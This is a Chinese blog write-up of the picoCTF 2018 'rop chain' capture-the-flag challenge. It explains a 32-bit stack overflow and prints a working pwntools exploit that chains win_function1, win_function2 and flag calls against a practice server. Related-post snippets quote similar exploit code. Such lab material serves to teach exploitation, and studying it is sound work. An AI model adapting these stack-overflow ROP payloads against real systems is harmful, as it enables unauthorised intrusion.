picoctf_2018_rop chain wp(python3)

于 2023-06-02 20:56:14 发布
阅读量247 收藏 1
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kata_Jhin/article/details/131014014
版权

事前准备

就一个nx

进ida看看

ida调用vuln()明显栈溢出

有个flag,反向交叉引用跟一下

一个flag调用函数,有几个参数要求

function里面能看见几个设置win的

漏洞及其利用思路

这题实际上就是栈溢出,然后考了一下函数调用参数以及返回地址的一个部署规则

也就是标题的rop chain,

rop chain

32位下不涉及对于寄存器的使用,参数直接由栈中部署调用,需要满足的规则是

funcadd(调用地址)+retadd(返回地址)+agrsadd(调用参数地址)

这只是单个链子,但实际上栈溢出是直接劫持程序执行流,所以后面要执行其它函数就在retr出写上调用地址就行了,而stack overflow覆盖的也就是ret地址。也就是说ret和调用地址本质上是一个东西,只是这里为了区分,分开来表述。

由此,那么func的参数调用完了就是ret函数的参数地址,也就是

func1add(调用地址)+func2add(返回地址)+agrs1add(函数1参数地址)+agrs2add(函数2add)+.....

这就是rop chain

使用

而这题涉及两个函数的两个参数,一个是win2的-1163220307(0xBAAAAAAD)

数字记得ida 按H转hex放payload,不然会报out of range

另一个就是flag函数的-559039827(0xDEADBAAD)

exp:


from pwn import*

p=remote('node4.buuoj.cn', 26992)


#p=process('./PicoCTF_2018_rop_chain')
#p=gdb.debug('./PicoCTF_2018_rop_chain')
elf=ELF('./PicoCTF_2018_rop_chain')
context(arch='i386',log_level = 'debug',os = 'linux')
mainadd=elf.symbols['main']

win2=0x080485F2

win1add=0x080485CB 
win2add=0x080485D8
#win2(-1163220307)
flagadd=0x804862B

#flag(-559039827)


#下面是libc的泄露部分		ROPgadget --binary filename  --only 'pop|ret' | grep 'eax’

payload= b'a'*(0x18+4) + p32(win1add)+p32(win2add)+p32(flagadd)+p32(0xBAAAAAAD)+p32(0xDEADBAAD)
p1=payload

p.sendline(p1)


p.interactive()

getflag:

另:

在win2的在bss段上的复制是的if内完成的,个人认为应该可以直接ret那段0x080485F2,但是不会有flag,不是很理解为什么

Kata_Jhin
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PicoCTF_2018_rop_chain
m0_74073577的博客
02-23 371
PicoCTF_2018_rop_chain
Ropgadget中ropchain的详细分析
最新发布
流水不争先,争的是滔滔不绝
03-27 1259
通常情况下,由于程序的输入长度有限制,而ROPgadget生成的ropchain过长,导致ropchain无法适用,如果能够针对ropchain进行简单的修改的话,那便能减少构建rop链花费的心思。
【BUUCTFPWN】picoctf_2018_rop chain
m0_55368674的博客
01-19 181
ret2text
exrop:自动ROPChain生成
04-23
多余的 Exrop是自动ROP链生成器工具,可以根据给定的二进制文件和约束条件自动构建小工具链 要求: , 目前仅支持x86-64! 特征: 处理单向小工具(jmp reg,call reg) 设置寄存器( rdi=0xxxxxx, rsi=0xxxxxx ) 将寄存器设置为寄存器( rdi=rax ) 写给内存 将字符串/字节写入内存 函数调用( open('/etc/passwd',0) ) 函数调用中的传递寄存器( read('rax', bss, 0x100) ) 避免坏蛋 堆栈Exrop.stack_pivot ( Exrop.stack_pivot ) syscall( Exrop.syscall ) 看 安装 安装python(推荐并测试3.6) 安装triton( ),确保将-DPYTHON36=on添加为cmake选项 安装ropgadget(
Buuctf(pwn) picoctf_2018_rop chain 栈溢出
半岛铁盒的博客
08-19 288
32位,开启了NX保护 利用思路 首先溢出后覆盖ret为function1函数地址,将win1赋值为1,之后跳转到function2的地址,a1是传入的参数,将a1传入即可满足条件去设置win2的值为1,之后去执行flag函数,if要满足的条件之前都设置好了,可以直接读出flag from pwn import * r = remote("node3.buuoj.cn", 26602) win_function1 = 0x080485CB win_function2 = 0x080485D8 fla.
rop-sample.rar_.comrop_rop_rop源码下载_taobao netty
09-20
基于ROP的SAMPLE开发代码,属于通信框架的一部分。ROP是淘宝提供的一种开发协议框架,底层基于NETTY。
arm64_rop_exploit:Arm64返回定向编程(ROP)漏洞
03-02
arm64_rop_exploit arm64 rop工具二进制文件,用于将arm64反向外壳程序代码映射到内存中并执行代码这仅适用于目标arm64设备。 用于将rop工具映射到内存中并从libc库执行shell代码的源代码。 在运行Ubuntu 18.04....
Rops.rar_The Conversion_rops
09-22
Note that this rop-form instruction has no dex-form equivilent and must be removed before the dex conversion.
STM8_Unlock_Flash_ROP_issue_ROPCLEAR_unlock_stm8s003_stm8s103_
10-03
STM8S103
[BUUCTF]PWN——picoctf_2018_rop chain
mcmuyanga的博客
11-04 955
picoctf_2018_rop chain 附件 步骤: 例行检查,32位,开启了NX保护 试运行一下程序,看到输入太长数据会崩溃 32位ida载入,习惯性的检索程序里的字符串,看见了flag.txt,双击跟进 看到程序将flag读入到了参数s里面,满足条件win1&&win2 &&a1==-59039827的条件,就能读出flag 从main函数开始看程序 vuln()函数 gets函数输入,没有限制读入长度,存在溢出漏洞,覆盖ret为flag函数地址,之后想
angrop——自动构建rop链的工具
^_^
01-03 1241
angrop是一个自动化生成rop链的工具。他是基于angr的符号执行引起,并且用约束求解去生成rop链,而且可以理解gadget的作用。 angrop这个工具构造长的rop链要比人工快多了。 docker安装 拉取angr的镜像 sudo docker pull angr/angr 基于镜像创建容器 sudo docker run -it --name=angr_container angr/angr angrop用法 github上给出了一个简单的示例。 >>> import.
[BUUCTF-pwn]——cmcc_simplerop (ropchain)
Y_peak的博客
03-16 446
[BUUCTF-pwn]——cmcc_simplerop 有栈溢出,自己找rop链,最简单的方法,让ROPgadget帮我们弄好呀,可是有点长,所有需要我们修改。毕竟有长度要求。因为“/bin/sh"字符串没有找到,所有这之前的都不动, 下面的pop eax; pop ebx; pop ecx; pop edx除了pop ebx 注意下,其他都可以进行修改 inc就是 ++ exploit 目的:使得excve("/bin/sh") eax = 0xb; ebx ->"/bin/sh"; ecx
picoctf_2018_rop chain
qq_62887641的博客
08-10 239
满照例checksec。查看main顺进去看。初步看,满足win1 && win2 && a1 == -559039827 我们就能得到flag了
BUUCTF:picoctf_2018_rop chain(write up)
qq_44768749的博客
08-26 1181
BUUCTF:picoctf_2018_rop chain0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp关键代码说明 0x01 文件分析 32位程序,开启了栈不可执行、部分RELRO保护 0x02 运行 输入一串字符串,根据题名也知道需要构造ROP 0x03 IDA 主函数 vuln函数 漏洞点:没有限制输入字符串长度 flag函数 win_function1函数 win_function2函数 0x04 思路 flag函数为后门函数
orw (pwnable_orw和[V&N2020 公开赛]warmup)和 picoctf_2018_rop chain 记录笔记
carol2358的博客
05-21 1329
学到一种新的做法,orw(open,read,write),可以用在system,fork syscall(不能打开子进程,需要在当前进程里读入flag并输出) 和execve被禁的情况下打印出flag,还有seccomp 虽然还不太懂,但先记录一下目前的理解 seccomp安全机制能使一个进程进入到一种“安全”运行模式,该模式下的进程只能调用4种系统调用(system call),即 read(), write(), exit() 和 sigreturn(),否则进程便会被终止。 著作权归作者所有。商业转
buuctf PicoCTF_2018_rop_chain
FUCKING12的博客
02-22 3291
PicoCTF_2018_rop_chain 没什么好说的就是一个rop链构造 上代码 from pwn import * #node4.buuoj.cn:25469 #io=remote("node4.buuoj.cn",25469) io=process("./PicoCTF_2018_rop_chain") elf=ELF('./PicoCTF_2018_rop_chain') context.log_level='debug' #io.recvline("Enter your input>
【4.29安恒杯】writeup
热门推荐
wintersun的地带
04-19 1万+
#### 安恒杯_writeup 以下为比赛中做出的题目MISC: SHOW ME THE FLAGCRYPTO: LAZYATTACK这一题很巧,全部的队伍里面只有我们一个队伍将其做出来。 这一题做出来完完全全是靠运气,在当我做出这一题的时候感觉是懵逼的,完全不知道是怎么回事,flag一下子就出来了而且对了,很兴奋。队友都相互说用了和出题人同一个软件,才得到的答案。结果确实是和出题人用
一种比较麻烦的Rop链构造——ret2dlresolve
dydxdz的博客
04-09 3780
ret2resolve 题目:0ctf 2018 babystack 上周末做了TCTF(0ctf 2018)的新人赛,题目难度适中,但垃圾如我一如既往没有做出几道题。在7o8v大佬的帮助下,弄懂了babystack的考察点和ret2resolve的利用原理,因此对照着wp记录一波。 0x01 ret2dlresolve原理 当一个程序第一次调用libc中的函数时,必须首先对libc中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值